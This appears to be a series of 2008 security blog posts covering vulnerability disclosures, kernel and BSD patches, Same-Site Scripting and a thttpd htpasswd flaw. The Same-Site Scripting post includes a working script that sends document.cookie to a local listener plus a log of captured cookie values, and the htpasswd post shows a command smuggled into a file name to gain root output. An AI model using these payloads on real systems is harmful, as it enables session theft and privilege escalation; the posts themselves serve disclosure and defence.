No credit = exploit

Because Microsoft refused to credit the researcher who reported MS08-011/CVE-2008-0108 a corresponding exploit was publicly released. A person or group going by the name chujwamwdupe chujwamwdupe posted the exploit to Full-disclosure.

Unfortunately, Microsoft has refused to credit you using the name you requested.

I think there's a mixup in the iDefense Labs advisory, unless sillypea is chujwamwdupe. The CREDIT section says:

This vulnerability was reported to VeriSign iDefense by sillypea.

The acknowledgments on the Microsoft bulletin says:

VeriSign iDefense VCP for reporting the Microsoft Works Converter Overrun Vulnerability (CVE-2008-0108).

Microsoft flagged the pseudonym as offensive. This is similar to what happened when Manuel Santamarina Suarez aka FistFuXXer reported MS06-059/CVE-2006-2387. They had to drop FistFuXXer in the bulletin.

I wonder what does the polish word chujwamwdupe really mean ?

Coredumps

I noticed a design error similar to CVE-2007-6206 in DragonFly BSD. It is reported that OpenBSD and FreeBSD exhibit the same.
   

My suggested patch:

--- kern_sig.c  2008-02-14 13:41:12.000000000 +0800
+++ kern_sig-20080216.c 2008-02-16 01:15:01.000000000 +0800
@@ -2066,6 +2066,12 @@ coredump(struct lwp *lp, int sig)
               goto out1;
       }

+        /* Don't dump to files current user does not own */
+       if (vattr.va_uid != p->p_ucred->cr_uid) {
+               error = EFAULT;
+               goto out1;
+       }
+
       VATTR_NULL(&vattr);
       vn_lock(vp, LK_EXCLUSIVE | LK_RETRY);
       vattr.va_size = 0;

A DragonFly BSD developer asked me if they should rather remove the file and recreate a new file which then will be owned by root. In my opinion checking for ownership is better and safer. We are avoiding other possible bugs e.g. allowing to read files you don't own but resides on a directory you own. I also find my fix more compact.

By the way as seen in my patch, we wouldn't want to hard code != 0 because DragonFly may implement a type enforcement system or authorization framework in the near future.

Reliable root since 2006

A couple of advisories detailing local privilege escalation vulnerabilities in the Linux kernel has been published. The CVE entries for these vulnerabilities are:

• CVE-2008-0009
• CVE-2008-0010
• CVE-2008-0600

Both CVE-2008-0009 and CVE-2008-0010 was fixed upstream on February 8 with the following commit message:

splice: missing user pointer access verification
vmsplice_to_user() must always check the user pointer and length
with access_ok() before copying. Likewise, for the slow path of
copy_from_user_mmap_sem() we need to check that we may read from
the user region.

There's a public exploit for CVE-2008-0010. Below is the fix from the Linux tree. The first hunk applies to CVE-2008-0010 and the second to CVE-2008-0009:

--- a/fs/splice.c
+++ b/fs/splice.c
@@ -1179,6 +1179,9 @@ static int copy_from_user_mmap_sem(void *dst
 {
        int partial;
 
+       if (!access_ok(VERIFY_READ, src, n))
+               return -EFAULT;
+
        pagefault_disable();
        partial = __copy_from_user_inatomic(dst, src, n);
        pagefault_enable();
@@ -1387,6 +1390,11 @@ static long vmsplice_to_user(struct file *file
                        break;
                }
 
+               if (unlikely(!access_ok(VERIFY_WRITE, base, len))) {
+                       error = -EFAULT;
+                       break;
+               }
+
                sd.len = 0;
                sd.total_len = len;
                sd.flags = flags;

CVE-2008-0600 was fixed upstream on February 10 with a commit message of:

splice: fix user pointer access in get_iovec_page_array()

Commit 8811930dc74a503415b35c4a79d14fb0b408a361 ("splice: missing user
pointer access verification") added the proper access_ok() calls to
copy_from_user_mmap_sem() which ensures we can copy the struct iovecs
from userspace to the kernel.

But we also must check whether we can access the actual memory region
pointed to by the struct iovec to fix the access checks properly.

The upstream fix:

--- a/fs/splice.c
+++ b/fs/splice.c
@@ -1234,7 +1234,7 @@ static int get_iovec_page_array(const struct iovec __user *iov,
                if (unlikely(!len))
                        break;
                error = -EFAULT;
-               if (unlikely(!base))
+               if (!access_ok(VERIFY_READ, base, len))
                        break;
 
                /*

There's also a public exploit for this issue.

Linux 2.6.24.1 which was released on 2008-02-08 20:25 UTC fixes CVE-2008-0009 and CVE-2008-0010 only. Simply CVE-2008-0009 and CVE-2008-0010 affects 2.6.23-2.6.24 and CVE-2008-0600 affects 2.6.17-2.6.24.1.

A little background on vmsplice(2). Along with splice(2) and tee(2), vmsplice(2) was introduced for public consumption in Linux 2.6.17. The splice I/O method was implemented by Jens Axboe.

VMSPLICE(2)                Linux Programmer's Manual               VMSPLICE(2)

NAME
       vmsplice - splice user pages into a pipe

...

VERSIONS
       The vmsplice() system call first appeared in Linux 2.6.17.
...

Linux                             2006-04-28                       VMSPLICE(2)

This means we had at least one unknown exploitable privilege escalation vulnerability since June 2006. This vulnerability is possibly what was used to obtain root in recent mysterious compromises.

We can assume that the bad guys are hoarding more of these frightful bugs. So how can you protect from these vulnerabilities? Obtaining an under privileged shell is said to be easy because of insecure web applications and easily guessed SSH passwords. A properly configured access control system or by not allowing untrusted users to run executables from their writable directories comes into mind.

Browsers not adhering to SOP?

A few days ago Tavis Ormandy sent an advisory to Bugtraq:

It's a common and sensible practice to install records of the form
"localhost. IN A 127.0.0.1" into nameserver configurations, bizarrely
however, administrators often mistakenly drop the trailing dot,
introducing an interesting variation of Cross-Site Scripting (XSS) I
call Same-Site Scripting. The missing dot indicates that the record is
not fully qualified, and thus queries of the form
"localhost.example.com" are resolved. While superficially this may
appear to be harmless, it does in fact allow an attacker to cheat the
RFC2109 (HTTP State Management Mechanism) same origin restrictions, and
therefore hijack state management data.

Based on the advisory you can steal cookies on multi-user systems. The attacker starts a HTTP daemon bound to 127.0.0.1 on port 1024. Lures a victim to visit http://localhost.example.com:1024/example.gif. Cookies set by example.com are then sent to the HTTP daemon listening at 127.0.0.1:1024.

If you are familiar with the Same Origin Policy which is supposed to be implemented by popular browsers, you will think this is not possible. But quoting Tavis:

It appears to be a common mistake to confuse the JavaScript SOP and the HTTP originating host definition for Cookies with regard to port number. The JavaScript SOP does include the port number, where as RFC2109 explicitly does not. This behaviour is arguably incorrect, making it impossible to securely host a website from a multi-user machine, but nevertheless is the case, and is implemented by most major browsers.

Of course the best way to verify is test it yourself. Here in the Philippines Yahoo Mail is very popular and one of those affected by Same-Site Scripting is Yahoo.com. The FQDN localhost.yahoo.com resolves to 127.0.0.1. I log in to my Yahoo account and start a HTTP daemon bound to 127.0.0.1:1024 as a non-root user. Visited http://localhost.yahoo.com:1024/index.html which has the following source:

<html><script>document.location='http://127.0.0.1:1024/'+document.cookie</script></html>

On the HTTP daemon logs I see:

127.0.0.1 - - [24/Jan/2008:05:21:31 +0000] 
"GET /B=0q8rtapgs4wdb&b=3&s=nb;%20YLS=v=1&p=0&n=1;%20
F=a=mehEFaoMvT8woslcBRoiHBHL_ZH7tf0b70pskyc6Ko45aE_7m1zPdsU55J_FZpdieb7ABuo-&b=zK9B;%20
Y=v=1&n=d9uqwiam26nfr&l=1eoxrc5wy/o&p=m2gei983y2000000&iz=1200&r= 
HTTP/1.1" 404 0 "http://localhost.yahoo.com:1024/" "Opera/9.25"

Tested both Firefox 2.0.11 and Opera 9.25. Looks like both browsers do not adhere to Same Origin Policy 'different port restriction'.

Going back to the original advisory, this named misconfiguration issue is quite widespread because of an easily missed trailing dot. In the DDoS mitigation front it is a common practice to blackhole traffic by resolving attacked hosts to 127.0.0.1. Because of SSS soon it will become bad advise since stored cookies from a blackholed host will be in danger from resourceful attackers.

Almost outdated patch

Rummaging around my directories to free up space I saw htpasswdc_plusvalidation.patch which added htpasswd input validation for thttpd-2.25b. I wondered if it got into Gentoo Portage because I think the patch is two years old. Found it in /usr/portage/www-servers/thttpd/files/thttpd-2.25/
named additional-input-validation-httpd.c.diff. Checking the Changelog:

28 Feb 2007; Thilo Bangert <bangert@gentoo.org>
  +files/thttpd-2.25/additional-input-validation-httpd.c.diff,
  +files/thttpd.logrotate, +thttpd-2.25b-r7.ebuild:
  add logrotate script (bug #150993)
  run under thttpd user instead of nobody (bug #151227)
  extra input sanitation for htpasswd (bug #128165)
  einfo -> elog

Last time I looked at my Gentoo bug report, it was not considered a security issue. Www-servers herd merged the patch in February 2007, and I only noticed it today.

About the actual vulnerability, the reporter's main contention is that some people will run htpasswd through sudo. See CVE-2006-1079 and OSVDB:23828:

larry@mog:~$ sudo /bin/htpasswd -c "blh;id>lp" www
larry@mog:~$ sudo /bin/htpasswd "blh;id>lp" www
Changing password for user www
New password:
Re-type new password:
larry@mog:~$ cat lp
uid=0(root) gid=0(root) groups=0(root)
larry@mog:~$ sudo id
We trust you have received the usual lecture from the local System Administrator. 
It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
Password:
Sorry, user larry is not allowed to execute '/usr/bin/id' as root on mog.

Almost a year before it was merged and almost two years has passed before I noticed. On another submission, the netstat-nat spell (similar to an ebuild in Gentoo) I submitted to Sourcemage Linux in April 2005 was merged in December 2007, almost three years. I am sure this is because of lack of manpower. See the spell submission.

MS08-001 details

A critical vulnerability affecting Windows XP SP2, 2000 SP4, Server 2003 and Vista was patched this tuesday. From the bulletin:

This critical security update resolves two privately reported vulnerabilities in Transmission Control Protocol/Internet Protocol (TCP/IP) processing. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

MS08-001 is broken down to CVE-2007-0066 and CVE-2007-0069, the former does not affect Windows Vista and the latter does not affect Windows 2000 SP4. The vulnerabilities were found by IBM X-Force, the Frequency X blog has additional information. But the recently started Microsoft Security Vulnerability Research & Defense blog does a better job disseminating the details. Quoting:

At the end, we probably should note that you might be wondering if we are releasing too much technical detail about this vulnerability, which somehow could help miscreants develop an attack. Please be assured that these details cannot be used to create an attack and that the security of customers is our primary concern.

Microsoft has gotten better with advisories and the MSVRD blog is a great initiative. Sharing in-depth technical information about vulnerabilities in your products is commendable.